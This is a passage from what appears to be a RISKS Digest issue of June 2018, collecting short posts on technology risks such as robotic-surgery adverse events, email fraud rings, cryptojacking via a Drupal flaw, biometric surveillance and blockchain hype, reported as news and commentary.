    to scare or show power. Even after a partner had left the home, the
    devices often stayed and continued to be used to intimidate and confuse.

    ------------------------------

    Date: Tue, 19 Jun 2018 13:53:56 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Adverse Events in Robotic Surgery: A Retrospective Study of
    14 Years of FDA Data (arxiv.org)

    Homa Alemzadeh, Ravishankar. Iyer, Zbigniew Kalbarczyk, Nancy Leveson, Jai Raman
    http://arxiv.org/pdf/1507.03518.pdf

    An acquaintance expressed enthusiasm for their forthcoming robotic surgical
    procedure. The well-respected Southern California National Cancer Institute
    at the City of Hope -- a hospital and medical- industrial complex -- effused
    the benefits of the "world's best robotic surgeon."

    Being cautious about a hard-sell, I sent a link to this report with a few
    choice questions to inquire about before signing the consent form. Wonder
    what this analysis would show for the past 4+ years of MAUDE data? Similar
    trend, better, or worse?

    >From the summary page:

    Methods: Weanalyzed the adverse events data related to robotic systems and
    instruments used in minimally invasive surgery, reported to the U.S. Food
    and Drug Administration (FDA) MAUDE database from January 2000 to December
    2013. We determined the number of events reported per procedure and per
    surgical specialty, the most common types of device malfunctions and their
    impact on patients, and the causes for catastrophic events such as major
    complications, patient injuries, and deaths.

    Results: During the study period, 144 deaths (1.4% of the 10,624 reports),
    1,391 patient injuries (13.1%), and 8,061 device malfunctions (75.9%) were
    reported. The numbers of injury and death events per procedure have stayed
    relatively constant since 2007 (mean = 83.4, 95% CI, 74.2 [?] 92.7).
    Surgical specialties, for which robots are extensively used, such as
    gynecology and urology, had lower number of injuries, deaths, and
    conversions per procedure than more complex surgeries, such as
    cardiothoracic and head and neck (106.3 vs. 232.9, Risk Ratio = 2.2, 95%
    CI, 1.9-2.6). Device and instrument malfunctions, such as falling of
    burnt/broken pieces of instruments into the patient (14.7%), electrical
    arcing of instruments (10.5%), unintended operation of instruments (8.6%),
    system errors (5%), and video/imaging problems (2.6%), constituted a major
    part of the reports. Device malfunctions impacted patients in terms of
    injuries or procedure interruptions. In 1,104 (10.4%) of the events, the
    procedure was interrupted to restart the system (3.1%), to convert the
    procedure to non-robotic techniques (7.3%), or to reschedule it to a later
    time (2.5%).

    Conclusions: Despite widespread adoption of robotic systems for minimally
    invasive surgery, a non-negligible number of technical difficulties and
    complications are still being experienced during procedures. Adoption of
    advanced techniques in design and operation of robotic surgical systems
    may reduce these preventable incidents in the future.

    ------------------------------

    Date: Thu, 21 Jun 2018 19:07:21 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: When the Robot Doesn't See Dark Skin (NY Times)

    http://mobile.nytimes.com/2018/06/21/opinion/facial-analysis-technology-bias.html

    A graduate student's testimonial about algorithmic bias, and a
    harbinger to corporations that deploy facial recognition to assist
    hiring decisions and to enable their revenue capture processes.

    ------------------------------

    Date: Tue, 12 Jun 2018 18:55:01 -0700
    From: "Sanders, Rex" <rsan...@usgs.gov>
    Subject: Having better risk-based analysis for your banks and credit cards

    One of my back-of-card numbers routes you to a seemingly
    infinite-depth tree of `press 1 for another marketing pitch' choices,
    which I've never plumbed deep enough to find the fraud department.

    I once had the direct line to the fraud department -- see RISKS-27.85
    for that depressing story. If only I could remember where I kept that
    number... Now I just call the local branch and have them route me.

    Just checked - the number on the back of my oldest card has rubbed
    off. That's OK, I couldn't read it without a magnifying glass
    anyway. Maybe better physical protection and larger typefaces for
    critically important numbers?

    Assuming your bank is halfway competent at simple, non-digital UX is also RISKy.

    ------------------------------

    Date: Wed, Jun 13, 2018 at 3:09 AM
    From: Dewayne Hendricks <dew...@warpspeed.com>
    Subject: It's time to stop laughing at Nigerian scammers, because they're
    stealing billions of dollars (Cleve R. Wootson Jr.)

    Cleve R. Wootson Jr., *The Washington Post*, 12 Jun 2018

    http://www.washingtonpost.com/news/...-because-theyre-stealing-billions-of-dollars/>

    By this point, savvy people know it's a bad idea to trust an email from a
    Nigerian prince hoping to use their bank account to unload a dead relative's
    vast wealth.

    And they're just as suspicious of the sudden Internet-based love interest
    with questionable grammar who needs a few thousand untraceable dollars to
    clear up a passport issue in time for a magical first date.

    But in a sophisticated and terrifying evolution of the Nigerian 419 scam,
    web-savvy crime syndicates are figuring out ways to bilk U.S. citizens of
    billions.

    On Monday, the FBI announced the arrest of 74 people across the world --
    including 29 people in Nigeria and 41 in the United States -- who
    authorities say were part of complex international networks that combed
    filings by the Securities and Exchange Commission, spoofed CEO emails and
    successfully targeted even hardened employees whose jobs are to safeguard
    their companies from financial mismanagement.

    The recent scams have the same DNA as the poorly worded emails that have
    been showing up in people's inboxes since the 1990s. Instead of playing on
    hopes of finding love or lust for sudden wealth, they play on fears about
    missing a vital company payment or upsetting a boss's boss.

    ``[Scammers] are doing their research =A6 going onto company websites and
    looking for the right people,'' FBI Assistant Director Scott Smith, who
    helped lead the investigation, told the Wall Street Journal. ``They may even
    go as far as pulling annual reports and finding what companies they do
    business with and [impersonating] those accounts.''

    Adeyemi Odufuye and his team, for example, sifted SEC records, company
    websites and other business documents, looking for the names and email
    addresses of chief executives, chief financial officers and controllers,
    court documents say.

    Odufuye, who had a half dozen nicknames, including ``Jefe,'' the Spanish
    word for ``chief'' or ``boss,'' led a crew responsible for stealing $2.6
    million, including $440,000 from one business in Connecticut, according to
    the Justice Department.

    The schemes used a variety of tactics to gain people's trust and steal their
    money, federal authorities say. They registered website domain names that
    were hard to distinguish from the companies they were targeting --
    impersonations meant to give emails an air of authenticity. Some of those
    emails arrived with malware attachments that would snap images of a victim's
    desktop or transmit key log information -- a hacker trick for nabbing
    someone's password.

    They even employed money mules whose sole purpose was to move the ill-gotten
    gains from account to account, authorities say, disguising the electronic
    paper trail from investigators.

    Odufuye was extradited from Britain on Jan. 3. He pleaded guilty to one
    count of conspiracy to commit wire fraud and one count of aggravated
    identity theft.

    The arrests highlighted just how many people are falling for the latest
    iterations of the Nigerian hustle, as well as the staggering losses American
    businesses are accruing. According to FBI figures obtained by the Journal,
    victims of such scams reported $275 million in losses in 2015. By 2017,
    reported losses had more than doubled, to $675 million. And in the first
    quarter of this year, more than 4,000 victims reported $685 million in
    losses. The bureau estimates American businesses have lost more than $3.7
    billion as a result of the schemes. [...]

    ------------------------------

    Date: Mon, 25 Jun 2018 23:01:26 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Those Chinese-language robocalls are a scam to get your bank
    information, officials say (WashPo)

    Chinese-language robocalls deliver news that grabs your attention, but
    officials say its a scam.
    http://www.washingtonpost.com/techn...scam-get-your-bank-information-officials-say/

    ------------------------------

    Date: Sat, 23 Jun 2018 23:10:23 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: How a company outed China's spies: David Sanger

    David Sanger at the /New York Times/ has out a new book on cyber-espionage
    and digital intrigue, /The Perfect Weapon: War, Sabotage, and Fear in the
    Cyber Age/
    http://click.email.fortune.com/?qs=...d168ee80c33101dac76cd060ebedf808eee024af7038d
    While I have not yet read it, I did catch an excerpt that has been making
    the rounds on Twitter. The passage reveals new details about how Mandiant
    http://click.email.fortune.com/?qs=...5d534fe899947777dd672ffba305d0eda1a47b626850c
    a computer forensics firm founded by Kevin Mandia, a U.S. Air Force veteran,
    clinched its landmark linking of a Chinese hacking group that had ravaged
    American corporates in years past and Unit 61398 of the Chinese
    military. (Hat tip to Thomas Rid, a professor of strategic studies at Johns
    Hopkins University's School of Advanced International Studies and author of
    another excellent book, /Rise of the Machines: A Cybernetic History/
    <http://click.email.fortune.com/?qs=...08d819ad9908f1453a14ffe8667be803e821ccf1bfce3

    Here's the section in question: ``As soon as they detected Chinese hackers
    breaking into the private networks of some of their clients -- mostly
    Fortune 500 companies -- Mandia's investigators reached back through the
    network to activate the cameras on the hackers' own laptops,'' Sanger
    writes. ``They could see their keystrokes while actually watching them at
    their desks.''

    When Mandiant released its report
    <http://click.email.fortune.com/?qs=...a1d54b32b5acb7a4899f461362a1eafd6018485d37e07>
    on the hacking group, so-called Advanced Persistant Threat 1, or ``APT1,''
    the paper was a bombshell. Now five years later, the firm's methodology, as
    revealed by Sanger, has resulted in a second bombshell. If accurate -- and
    it seems to be, given that Sanger describes personally watching over the
    shoulders of Mandiant's crew while it spied on the spies -- the anecdote
    suggests that Mandiant engaged, even if mildly, in a ``hack back,'' a highly
    controversial and legally dubious countermeasure. (The firm did not
    immediately respond to /Fortune's/ request for comment about the incident on
    Saturday afternoon.)

    http://view.email.fortune.com/?qs=e...8b49489ddc97cff62553d68593c70e2199e1a46148814

    ------------------------------

    From: Monty Solomon <mo...@roscom.com>
    Date: Fri, 22 Jun 2018 00:01:27 -0400
    Subject: Chinese Fans Paid Dearly for World Cup Tickets That Never
    Materialized. (NYTimes)

    The New York Times, 21 Jun 2018
    http://www.nytimes.com/2018/06/21/world/asia/china-world-cup-ticket-scam-anzhi.html

    Thousands of Chinese soccer fans may have been victims of a ticketing swindle allegedly orchestrated by a Moscow company.

    ------------------------------

    Date: Fri, 22 Jun 2018 10:16:33 -0400
    From: Jose Maria Mateos <ch...@rinzewind.org>
    Subject: Germany becomes the last big Western power to buy killer robots
    (Innocence lost -- The Economist)

    http://www.economist.com/europe/201...ern-power-to-buy-killer-robots?fsrc=rss%7Ceur

    To the relief of commanders and the dismay of pacifists, Germany's armed
    forces have crossed a threshold. On June 13th a Bundestag committee voted to
    approve the spending of nearly $1.1bn to lease from Israel five drones which
    can be equipped with deadly weapons. Hitherto Germany has been the only big
    Western country not to buy ``killer robots''. In part this reflects
    antipathy to America's use of remotely controlled missiles for ``targeted
    killings'' of terrorist suspects (and the people standing next to them) in
    places like Pakistan and Yemen.

    What a relief, yes.

    http://rinzewind.org/blog-es

    ------------------------------

    Date: Fri, 22 Jun 2018 10:17:51 -0400
    From: Jose Maria Mateos <ch...@rinzewind.org>
    Subject: Orlando Airport Becomes 1st In US To Require Face Scan Of All
    International Travelers (Talking Points Memo)

    http://talkingpointsmemo.com/news/orlando-international-airport-face-scan-requirement

    Florida's busiest airport is becoming the first in the nation to require a
    face scan of passengers on all arriving and departing international flights,
    including U.S. citizens, according to officials there.

    The expected announcement Thursday at Orlando International Airport alarms
    some privacy advocates who say there are no formal rules in place for
    handling data gleaned from the scans, nor formal guidelines on what should
    happen if a passenger is wrongly prevented from boarding.

    https://rinzewind.org/blog-es

    ------------------------------

    Date: Wed, 20 Jun 2018 13:58:49 -0700
    From: Mark Thorson <e...@dialup4less.com>
    Subject: Cryptocurrency exchange hacks in 2018 (Taipei Times)

    The second in two weeks in South Korea:

    http://www.taipeitimes.com/News/biz/archives/2018/06/21/2003695228

    In January, a Japanese exchange was hacked for nearly USD$500 million.
    The market prices for various cryptocurrencies appear to have declined
    in response to these events.

    ------------------------------

    Date: Sun, 17 Jun 2018 20:03:42 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Bitcoin Could Break the Internet, Central Banks' Overseer Says
    (Bloomberg)

    http://www.bloomberg.com/news/artic...reak-the-internet-central-banks-overseer-says

    Bitcoin Could Break the Internet, Central Banks' Overseer Says

    Swiss-based BIS says cryptocurrencies have design flaws

    Blockchain can't handle or replace current payment system load

    The Bank of International Settlements just told the cryptocurrency world
    it's not ready for prime time -- and as far as mainstream financial services
    go, may never be.

    In a withering 24-page article released Sunday as part of its annual
    economic report, the BIS said Bitcoin and its ilk suffered from `a range of
    shortcomings' that would prevent cryptocurrencies from ever fulfilling the
    lofty expectations that prompted an explosion of interest -- and investment
    -- in the would-be asset class.

    ------------------------------

    Date: Thu, 14 Jun 2018 11:36:22 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: West Virginia Becomes First State to Test Mobile Voting by
    Blockchain in a Federal Election (GovTech)

    West Virginia has become the first state to allow Internet voting by
    blockchain, offering the technology to deployed and overseas military
    service members and their families in two counties.

    The pilot test is in place for the state's May 8 primary elections and is
    very limited in scope -- West Virginia Secretary of State Mac Warner said
    maybe a couple dozen voters will participate. But if it goes well, the state
    wants to try allowing all eligible military voters statewide to use it
    during the November general elections.

    ``I'm really not concerned about numbers. We're really just looking at the
    technology.''

    http://www.govtech.com/biz/West-Vir...ting-by-Blockchain-in-a-Federal-Election.html

    ------------------------------

    Date: Wed, 13 Jun 2018 15:57:06 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: The Tractors that Turn Farmers into Hackers (Now I Know)

    So farmers are fighting back. First, they're filing lawsuits, challenging
    the application of the DMCA. Second, they're lobbying state governments as
    well as the federal government, seeking protection from the DMCA in this
    fashion. (There's a growing movement
    http://www.fastcompany.com/40518779/right-to-repair-legislation-has-now-been-introduced-in-17-states
    for states to adopt a *right to repair*, for example.) John Deere is
    challenging those efforts, and they're slow to come about anyway. Urgency
    demanded an immediate response. The result: As Motherboard reports,
    <http://motherboard.vice.com/en_us/a...acking-their-tractors-with-ukrainian-firmware>
    tractor hacking is growing increasingly popular.

    The Motherboard reporter made his way to an online message board where
    unauthorized copies of John Deere software are for sale. There, he found
    dozens of threads from farmers desperate to fix and modify their own
    tractors. According to people on the forums and the farmers who use it, much
    of the software is cracked in Eastern European countries such as Poland and
    Ukraine and then sold back to farmers in the United States.

    By and large, the solution seems to work -- for now at least. Forbes warns
    that this third-party software may contain malware: ``It's possible infected
    farm equipment might participate in illegal botnets, or worse, the malware
    might impact the safety of the operators.'' So there is some risk
    involved. On the other hand, there's risk at doing nothing. As one farmer
    using Ukrainian software told Motherboard, there's always a chance that John
    Deere (or a successor company) will just declare the tractor obsolete. And
    in that case, he asked, ``What happens [then]? Are we supposed to throw the
    tractor in the garbage, or what?''
    http://www.forbes.com/sites/jasonbl...oul-of-right-to-repair-movement/#6e56ffcb5ab9
    http://nowiknow.com/the-tractors-that-turn-farmers-into-hackers/

    ------------------------------

    Date: Mon, 25 Jun 2018 18:41:07 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Three-month-old Drupal vulnerability is being used to deploy
    cryptojacking malware" (Danny Palmer)

    Danny Palmer, ZDNet, 22 June 2018
    http://www.zdnet.com/article/three-...s-being-used-to-deploy-cryptojacking-malware/

    The update was deemed critical, but users who haven't applied the patch are
    being targeted by attackers deploying cryptocurrency miners.

    Drupal's content management software is a popular tool for building
    websites, but this popularity, combined with the critical vulnerability
    (dubbed 'Drupalgeddon 2' by some), means that attackers have found a way to
    make a profit.

    The vulnerability is being used to deliver cryptojacking malware, which
    quietly uses the power of the Drupal user's machine to mine for Monero,
    depositing it into wallets run by the attackers. The only side effects a
    victim might notice is that their system is running slower, or the fan is
    doing more work than usual. The secretive nature of cryptojacking has helped
    bolster its popularity among attackers during the course of the year. [...]

    ------------------------------

    Date: Fri, 22 Jun 2018 18:57:12 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: Hacker figured out how to brute-force iPhone passcode (ZDNet)

    https://www.zdnet.com/article/a-hacker-figured-out-how-to-brute-force-an-iphone-passcode/

    ------------------------------

    Date: Mon, 25 Jun 2018 18:42:51 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Supreme Court says police need a warrant for historical cell
    location records" (Zach Whittaker)

    Zack Whittaker for Zero Day, 22 Jun 2018
    The case was one of the long-awaited privacy legal decisions of the year.
    http://www.zdnet.com/article/supreme-court-search-warrant-cell-location-records

    ------------------------------

    Date: June 24, 2018 at 04:29:47 GMT+9
    From: Dewayne Hendricks <dew...@warpspeed.com>
    Subject: Why Hackers Aren't Afraid of Us (David E. Sanger)

    David E. Sanger, *The New York Times*, 16 Jun 2018
    The United States has the most fearsome cyberweaponry on the planet,
    but we won't use it for fear of what will come next

    http://www.nytimes.com/2018/06/16/sunday-review/why-hackers-arent-afraid-of-us.html

    WASHINGTON -- Ask finance ministers and central bankers around the world
    about their worst nightmare and the answer is almost always the same:
    Sometime soon the North Koreans or the Russians will improve on the two huge
    cyberattacks they pulled off last year. One temporarily crippled the British
    health care system and the other devastated Ukraine before rippling across
    the world, disrupting shipping and shutting factories -- a billion-dollar
    cyberattack the White House called ``the most destructive and costly in
    history.''

    The fact that no intelligence agency saw either attack coming -- and that
    countries were so fumbling in their responses -- led a group of finance
    ministers to simulate a similar attack that shut down financial markets and
    froze global transactions. By several accounts, it quickly spun into farce:
    No one wanted to admit how much damage could be done or how helpless they
    would be to deter it.

    Cyberattacks have been around for two decades, appearing in plotlines from
    ``Die Hard'' movies to the new novel by Bill Clinton and James
    Patterson. But in the real world, something has changed since 2008, when the
    United States and Israel mounted the most sophisticated cyberattack in
    history on Iran's nuclear program, temporarily crippling it in hopes of
    forcing Iran to the bargaining table. (The two countries never acknowledged
    responsibility for the attack.)

    As President Barack Obama once feared, a cyberarms race of historic but
    hidden proportions has taken off. In less than a decade, the sophistication
    of cyberweapons has so improved that many of the attacks that once shocked
    us -- like the denial-of-service attacks Iran mounted against Bank of
    America, JPMorgan Chase and other banks in 2012, or North Korea's hacking of
    Sony in 2014 -- look like tiny skirmishes compared with the daily
    cybercombat of today.

    Yet in this arms race, the United States has often been its own worst
    enemy. Because our government has been so incompetent at protecting its
    highly sophisticated cyberweapons, those weapons have been stolen out of the
    electronic vaults of the National Security Agency and the C.I.A. and shot
    right back at us. That's what happened with the WannaCry ransomware attack
    by North Korea last year, which used some of the sophisticated tools the
    N.S.A. had developed. No wonder the agency has refused to admit that the
    weapons were made in America: It raised the game of its attackers.

    Nuclear weapons are still the ultimate currency of national power, as the
    meeting between President Trump and Kim Jong-un in Singapore last week
    showed. But they cannot be used without causing the end of human
    civilization -- or at least of a regime. So it's no surprise that hackers
    working for North Korea, Iran's mullahs, Vladimir V. Putin in Russia and the
    People's Liberation Army of China have all learned that the great advantage
    of cyberweapons is that they are the opposite of a nuke: hard to detect,
    easy to deny and increasingly finely targeted. And therefore,
    extraordinarily hard to deter.

    That is why cyberweapons have emerged as such effective tools for states of
    all sizes: a way to disrupt and exercise power or influence without starting
    a shooting war. Cyberattacks have long been hard to stop because determining
    where they come from takes time -- and sometimes the mystery is never
    solved. But even as the United States has gotten better at attributing
    attacks, its responses have failed to keep pace.

    Today cyberattackers believe there is almost no risk that the United States
    or any other power would retaliate with significant sanctions, much less
    bombs, troops or even a counter cyberattack. And though Secretary of Defense
    Jim Mattis has said the United States should be prepared to use nuclear
    weapons to deter a huge non-nuclear attack, including using cyberweapons,
    against its electric grid and other infrastructure, most experts consider
    the threat hollow.

    At his confirmation hearings in March to become director of the N.S.A. and
    commander of the United States Cyber Command, Gen. Paul Nakasone was asked
    whether our adversaries think they will suffer if they strike us with
    cyberweapons. ``They don't fear us,'' General Nakasone replied.

    ------------------------------

    Date: Tue, 19 Jun 2018 14:47:36 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Beijing subways to get bio-ID system (StraitsTimes)

    http://www.straitstimes.com/asia/east-asia/beijing-subways-to-get-bio-id-system

    "BEIJING (CHINA DAILY/ASIA NEWS NETWORK) - The Beijing subway system plans
    to introduce bio-recognition technology at stations this year to improve
    transport efficiency and reduce costs, a senior manager said.

    "Two bio-recognition technologies - facial recognition and palm touch -
    are being considered, said Zhang Huabing, head of enterprise development
    for Beijing Subway, the operator of most lines in the city, during the
    International Metro Transit Exhibition in Beijing last Thursday (June 14).

    "Facial recognition technology can track passenger movements with cameras
    connected to online networks that recognise people when they enter a
    station, potentially allowing them to bypass traditional ticketing."

    A 21st century city needs a 21st century infrastructure. Tracking and
    surveillance of citizens is routine for an authoritarian government. Two
    systems, each keyed to a distinct biometric signature, increase correlation
    potential, and minimize false-positive/false-negative matches. Hope the
    reference compare files are consistent and accurate to avoid "rounding up
    the usual suspects." One step closer to P.K. Dick's "Minority Report"
    panoptic surveillance.

    ------------------------------

    Date: Wed, 13 Jun 2018 19:48:20 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Scanning immigrants old fingerprints, U.S. threatens to strip
    thousands of citizenship (WashPo)

    http://www.washingtonpost.com/world...30d8a2-6f2e-11e8-afd5-778aca903bbe_story.html

    "The report said U.S. Immigration and Customs Enforcement (ICE) has
    315,000 old fingerprint records being digitized and uploaded to the
    Homeland Security IDENT database.

    "Those prints can be compared with those already in the database.
    Foreigners who obtained American citizenship years ago and have been
    otherwise living quietly in the United States could be at risk of a knock
    at their doors."

    Biometrics, like other digital personal identifying information, are
    easy to store and retrieve for comparison purposes, though they can be
    forged (see http://catless.ncl.ac.uk/Risks/30/28#subj5.1)

    Judicial findings against ICE's IDENT DB matches will be difficult to
    overturn until an independent audit discovers a content and/or metadata
    discrepancy that halts expulsions.

    ------------------------------

    Date: Sun, 24 Jun 2018 11:43:36 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: M&A isn't what it used to be (Fortune)

    *Good help is hard to find.* One of the leading cryptocurrency producers,
    *Stellar*, is in talks to acquire *Chain*, the San Francisco-based startup
    building blockchain technology for the financial industry, for $500 million,
    to be paid in in Stellar's digital currency Lumens. The acquisition may be
    motivated more by the need to get Chain's engineering talent rather than its
    products -- a classic acquire, *Fortune* reports.
    http://click.email.fortune.com/?qs=...2e779eea1f42ce349d175d731870ed2c2254f314c2c7c

    I guess I'll create a digital currency, surely my broker will let me invest
    that. I'll mine a couple trillion dollars of it on my spare PC.

    ------------------------------

    Date: Sun, 24 Jun 2018 17:15:01 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: A new way to do big data with entity resolution (Web Informant)

    I have this hope that most of you reading this post aren't criminals, or
    terrorists. So this might be interesting to you, if you want to know how
    they think and carry out their business. Their number one technique is
    called channel separation, the ability to use multiple identities to prevent
    them from being caught.

    Let's say you want to rob a bank, or blow something up. You use one identity
    to rent the getaway car. Another to open an account at the bank. And other
    identities to hire your thugs or whatnot. You get the idea. But in the
    process of creating all these identities, you aren't that clever: you leave
    some bread crumbs or clues that connect them together, as is shown in the
    diagram.

    http://blog.strom.com/wp/?p=6586

    Tradecraft.

    ------------------------------

    Date: Wed, 20 Jun 2018 21:49:28 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Tesla sues former employee for allegedly stealing gigabytes of data,
    making false claims to media. (CNBC)

    http://www.cnbc.com/2018/06/20/tesl...tes-of-data-making-false-claims-to-media.html

    ------------------------------

    Date: Sun, 24 Jun 2018 11:45:50 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Show me the money (Fortune)

    *Show me the money*. Authors, software developers, and other creators could
    track and collect royalty payments directly using a new blockchain
    technology
    https://click.email.fortune.com/?qs...9bc9d06850a04292bb27cb946de9572d9b3a6b4b7ead4
    announced by *Microsoft* and consulting firm *EY* on Wednesday. "The scale,
    complexity and volume of digital rights and royalties transactions makes
    this a perfect application for blockchains," Paul Brody, EY's global
    innovation leader for blockchain, tells /Fortune/.

    ...because blockchains are so much simpler and better understood.

    ------------------------------

    Date: Thu, 21 Jun 2018 00:19:11 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Visa fingers 'very rare' datacentre switch glitch for payment
    meltdown (The Register)

    Visa has said a `very rare' partial network switch failure in one of its two
    data centres led to the fiasco earlier this month that caused millions of
    transactions in Europe to be declined.

    http://www.theregister.co.uk/2018/0...ems_on_very_rare_fault_in_data_centre_switch/

    Dang those partial failures -- so much worse than total failures.

    ------------------------------

    Date: Tue, 12 Jun 2018 23:30:03 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Recounting Horror Stories? Over Guitar Center's Warranties (NYTimes)

    Former employees and customers at the giant music retailer described
    problems with how it sells protection plans, particularly in Puerto Rico.

    Guitar Center said in a statement for this article that it had been ``made
    aware of an issue with some third-party protection plans that were sold in
    Puerto Rico over the past 30 months.''

    ``We found that -- despite our policies and systems in place --
    approximately 100 transactions including at least a protection plan have
    been made with Puerto Rican addresses.''

    The company said the transactions represented ``a tiny fraction'' of the
    warranties that it sells.

    It blamed a ``glitch in our computer system in 2017 that inadvertently
    allowed orders with Puerto Rican addresses to have protection plans
    processed,'' as well as ``a few employees acting outside of our longstanding
    policy.''

    http://www.nytimes.com/2018/06/07/business/guitar-center-warranty.html

    Yeah, the system did it. That's the ticket, blame the evil system...

    ------------------------------

    Date: Mon, 18 Jun 2018 20:20:21 -0600
    From: "Matthew Kruk" <mkr...@gmail.com>
    Subject: The Guy Who Robbed Someone at Gunpoint for a Domain Name Is Getting
    20 Years in Jail (Motherboard)

    How a meme and a failed armed robbery gave a whole new meaning to 'domain
    hijacking.'
    http://motherboard.vice.com/en_us/article/pavwj8/armed-robbery-domain-website-gunpoint-doitforstate

    ------------------------------

    Date: Sat, 16 Jun 2018 23:31:23 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Clarinetist discovers his ex-girlfriend faked a rejection letter
    from his dream school (The Washington Post)

    By this point, he and his girlfriend had already been broken up for more
    than a year. Even so, it did not occur to him that she could be responsible
    for impersonating him. ``I never would've even considered that the person I
    trusted the most would have done something like this to me.''

    But then one of his friends suggested the possibility thathis ex-girlfriend
    could be responsible. After all, when they dated, Abramovitz essentially
    lived with her, leaving his computer easily accessible to her. She knew his
    passwords and could have easily logged on to his email.

    In May 2016, Abramovitz and his friend tried logging on to the email account
    that sent the fake rejection letter, gilady...@gmail.com. Abramovitz
    remembered an old password the ex-girlfriend used for Facebook, ``and sure
    enough, we got right in.'' The ex-girlfriend's contact information appeared
    clearly in the email account. The only exchange in the Inbox was the
    rejection letter sent to Abramovitz.

    http://www.washingtonpost.com/news/...ked-a-rejection-letter-from-his-dream-school/

    Yeah, risks...

    ------------------------------

    Date: Mon, 18 Jun 2018 17:52:12 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Internet TV firmware update/soft power-switch failure

    While on vacation near Palm Springs, CA, the home we rented was equipped
    with all manner of internet of mistakes devices, including a Samsung
    SmartTV.

    At 0200 one morning, it switched on suddenly. Apparently, the owners -- out
    of convenience or pure ignorance -- elected for firmware auto-updates.

    The family was startled, as the volume had been boosted by the flash memory
    save and reboot; the legacy off-state was not restored. The line-of-sight TV
    controls remained operative.

    Although the Samsung SmartTV possesses an "Eco Solution" feature that
    auto-detects inactivity after 4 hours, or extended loss of signal, I cannot
    help imaging if the upgrade either bricked these soft switches, or it
    possessed a "thermal runaway" virus maliciously designed to ignite the unit.

    ------------------------------

    Date: Thu, 14 Jun 2018 17:26:29 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Ghost Cytometry May Improve Cancer Detection, Enable New Experiments
    (SciAm)

    http://www.scientificamerican.com/a...rove-cancer-detection-enable-new-experiments/

    A fascinating discussion on a new cell sorting technique to
    characterize morphology -- shape and type -- for disease detection.

    They tweaked the typical cytometry setup and added a single-pixel detector
    --a camera that images one pixel at a time rather than thousands at once
    -- creating a device that can generate a unique signature for
    fluorescently labeled cells based on the light they emit. Essentially this
    approach produces a ghost depiction of a cell's structure, an identifiable
    pseudo-image based on the activated light particles.

    A machine-learning algorithm then uses these ghost images to categorize
    the cells in real time, and another device sorts the incoming cells into
    separate compartments.

    Although some flow cytometers have been able to image cells for several
    years, ``this is the first instrument that allows the physical sorting of
    cells based on their morphology,'' Anne Carpenter, a computational
    biologist at the Broad Institute of MIT and Harvard who was not involved
    in the work, wrote in an e-mail. ``This is revolutionary.''

    No mention of the learning algorithm training regimen -- possibly steepest
    descent, and the potential to get trapped at a false optimization point.

    One needs to ask what the certification/license requirements are to market
    this device. Do the certification requirements mirror that for embedded
    medical devices, where a manufacturer only has to show "similarity" to
    legacy equivalent products, and skip random control trials?

    ------------------------------

    Date: Mon, 18 Jun 2018 17:27:00 -0700
    From: Rob Slade <rms...@shaw.ca>
    Subject: Creating bizarre interfaces

    It used to be called human-factors engineering when I went to school.
    Making sure that the system was as obvious and transparent as possible for
    the user.

    Since somewhat prior to the assassination of the CISSPforum by ISC2 (no, I'm
    not bitter. Why do you ask?), I've been exploring the interface for the new
    "community." One of the topics has been "labels," and particularly
    searching for labels.

    http://community.isc2.org/t5/Custom...-difference-between-labels-and-tags/m-p/11584 or
    http://is.gd/jgVt7

    SamanthaO_isc2 has been helpful, and wrote:

    "I wanted to provide an update to you about searching and labels. We have
    enabled a filter for labels on the search page. While this does not allow
    you to search for labels directly, here is where you can see the various
    labels used throughout the Community, and filter results by certain labels."

    I couldn't find what she was talking about. So she posted a screen shot
    which showed that you could search on location ("board"), label, author,
    date, metadata, type of post, and contents with a series of buttons or drop
    downs. But these didn't show up when I went to the search page, so *I*
    posted a screen shot, showing that the buttons weren't there.

    And then denbesten posted:

    "If my window is 27cm wide, it looks like @rslade's screenshot. If 28cm, it
    looks like @SamanthaO_isc2's."

    He's right. (Well, pretty much right: the measurement on my screen seems
    slightly less, so I think it has to do with pixels, but ...) That *never*
    would have occurred to me.

    Given the lack of privacy (see
    http://catless.ncl.ac.uk/Risks/30/71#subj23). you can test it out
    for yourself at
    http://community.isc2.org/t5/forums/searchpage/tab/message

    Of course, now that it's been pointed out, I can see that you might want to
    reduce the complexity of the screen for mobile devices. But you might want
    to do it in such a way that it was obvious something was hidden or missing.

    I think I'll go back to researching security implications of quantum
    computing. It's simpler ...

    (So, if I put the window in the top left corner of the screen does it change
    languages?)

    ------------------------------

    Date: Thu, 14 Jun 2018 13:42:39 -0400
    From: Tony Harminc <thar...@gmail.com>
    Subject: More dodgy numbers - LinkedIn this time

    LinkedIn shows my age (for advertising purposes) as 55-2147483647.

    They are not wrong.

    ------------------------------

    Date: Thu, 21 Jun 2018 09:28:23 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Maybe they'll accept postcard calls for help

    *This is a message from Fairfax Alerts*

    Verizon Wireless is experiencing an outage affecting 9-1-1 and ten-digit
    dialing. Fairfax County residents can text 9-1-1 from a Verizon phone as an
    alternate.

    ------------------------------

    Date: Thu, 21 Jun 2018 22:16:06 -0400
    From: Ed Ravin <era...@panix.com>
    Subject: Re: Another risk of driverless cars (PGN, RISKS-30.72)

    You don't need to drive to an area without coverage to give your cell phone
    a denial-of-service attack -- cell service is subject to many other modes of
